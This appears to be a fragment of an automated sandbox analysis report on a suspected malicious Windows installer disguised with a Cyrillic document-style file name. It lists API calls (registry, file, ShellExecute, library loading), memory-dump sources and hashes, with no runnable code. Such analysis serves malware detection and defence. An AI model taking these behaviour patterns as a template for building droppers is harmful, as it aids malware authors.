                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: ExecuteShell
                                                            • String ID: C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen
                                                            • API String ID: 587946157-3772440268
                                                            • Opcode ID: 13bb213eff6f89f08f79e4a59b9be7f4166b3534cf4bed3308dd291eee77f677
                                                            • Instruction ID: 0361bc1bf0e5bad3f4d350e365ec67d8e7a994cc455aadcf30b9ce24d4d63aed
                                                            • Opcode Fuzzy Hash: 13bb213eff6f89f08f79e4a59b9be7f4166b3534cf4bed3308dd291eee77f677
                                                            • Instruction Fuzzy Hash: 89F0C236B00100AADB116FB99D4AEAD33A89B80728F240577F800F70D5DAFCC9419618
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                            • RegCloseKey.KERNELBASE(?,?,?,%trrelofternes%\Kompletteringernes.mov,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: de235efde7543297b92ff1b794c81f352b464fdc0bd75dbfd80076c014fb0a31
                                                            • Instruction ID: 9e7747ffe68dd38d2e91679843896ff1bba49b3e2177530597f16d8d521728a9
                                                            • Opcode Fuzzy Hash: de235efde7543297b92ff1b794c81f352b464fdc0bd75dbfd80076c014fb0a31
                                                            • Instruction Fuzzy Hash: 47119E31911205EBEB10CFA0CA489AEB7B4EF44354B20843FE046B72C0DAB89A41EB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                            • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                            • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                            • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteOpenValue
                                                            • String ID:
                                                            • API String ID: 849931509-0
                                                            • Opcode ID: bf99ba3e50e7e06d71ced8b6f55d33a0640fb5106778f09c39b76c358cfcaebd
                                                            • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                            • Opcode Fuzzy Hash: bf99ba3e50e7e06d71ced8b6f55d33a0640fb5106778f09c39b76c358cfcaebd
                                                            • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                              • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                              • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                              • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                            • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                            • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                            • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableShow
                                                            • String ID:
                                                            • API String ID: 1136574915-0
                                                            • Opcode ID: 8d91ee2e8e09c3b2d6d0a6cf9f8a1717f34b17491d476e4f294f68a65e4a056b
                                                            • Instruction ID: 183564fed45e15aac194635682d2540e1570045d11d23ff7c62c61356a4b5cad
                                                            • Opcode Fuzzy Hash: 8d91ee2e8e09c3b2d6d0a6cf9f8a1717f34b17491d476e4f294f68a65e4a056b
                                                            • Instruction Fuzzy Hash: 92E0C2326005009FDB10AFF5AE4999D3375DF90369710007FE402F10E1CABC9C40CA2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,80000000,00000003,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405C29
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405C4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                            • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                            • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                            • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405C19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                            • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                            • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                            • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CloseHandle.KERNEL32(FFFFFFFF,004035F2,?), ref: 004037CA
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\, xrefs: 004037DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\
                                                            • API String ID: 2962429428-2627852970
                                                            • Opcode ID: 11f2164fdcf4882d09a4a0de7c791955399c7c72b14224a7a720262371b4e31f
                                                            • Instruction ID: f140588c7f0437f4feb7db645ea9abd6b0460cad5339c8afa3da759f722761b4
                                                            • Opcode Fuzzy Hash: 11f2164fdcf4882d09a4a0de7c791955399c7c72b14224a7a720262371b4e31f
                                                            • Instruction Fuzzy Hash: 9CC0223010070042D0203F349E4F6143A546B00339FA08336B1F8B14F0C73C02A9881D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                            • GetLastError.KERNEL32 ref: 0040570F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                            • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                            • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                            • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                            • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                            • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                            • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: PathSearch
                                                            • String ID:
                                                            • API String ID: 2203818243-0
                                                            • Opcode ID: de5daba05d2537bd1dc84a2ff9aa9e25015d537aa2da064c296c2fdb59897553
                                                            • Instruction ID: a45d7dc5305941d7666a35b3d01b891a6d0eaa57df51e481eb70f0f5e8eed73c
                                                            • Opcode Fuzzy Hash: de5daba05d2537bd1dc84a2ff9aa9e25015d537aa2da064c296c2fdb59897553
